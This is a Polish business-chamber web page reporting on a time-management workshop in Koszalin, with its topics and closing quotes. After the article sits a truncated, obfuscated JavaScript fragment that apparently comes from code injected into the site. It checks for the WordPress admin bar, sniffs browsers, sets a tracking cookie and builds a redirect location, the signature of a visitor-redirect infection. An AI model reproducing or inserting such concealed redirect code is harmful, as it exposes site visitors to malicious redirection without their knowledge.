Relacja z warsztatów z zarządzania czasem i organizacji pracy. | Północna Izba Gospodarcza w Koszalinie

25 kwietnia  br. w City Box w Koszalinie odbyły się warsztaty z zarządzania czasem – organizacja czasu pracy. Szkolenie poprowadziła trenerka Pani Anna Możdżyńska.

Spotkanie miało na celu wypracowanie umiejętności zarządzania sobą w czasie i planowania własnej pracy. Rozwój umiejętności wpływających na podniesienie wśród menedżerów satysfakcji z pracy, rozwój kluczowych umiejętności sprawnego zarządzania zespołem, oraz umiejętności delegowania zadań. Rozwój metod zarządzania czasem , które doprowadzą do efektywnego realizowania wyznaczonych celów.

W czasie warsztatów omówione zostały zagadnienia tj.:

  • Jak gospodarujemy czasem w pracy?
  • Identyfikacja „pożeraczy czasu” w różnych branżach
  • Jak skutecznie formułować cele ?
  • Planowanie dnia
  • Zagadnienia dotyczące delegowania zadań

Na koniec Pani Anna przedstawiła „7 kroków ku lepszej organizacji czasu” oraz wspólnie z uczestnikami stworzyli propozycję, jak zarządzać swoim czasem.

Podsumowaniem warsztatów mogą być poniższe cytaty:

„Dobrze rozpoczęte znaczy w połowie zakończone” oraz

„Mistrzostwo nie polega na tym, by nie dawało się już nic dodać, ale by nie dało się już nic ująć”.

Kontakt do Pani Anny Możdżyńskiej

 

Serdecznie dziękujemy za udział i zapraszamy na kolejne spotkania z Północną Izbą Gospodarczą!

  'toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’http://’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[’push’](c[’shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(’0x7′)][b(’0x8′)](’;’);for(var m=0x0;m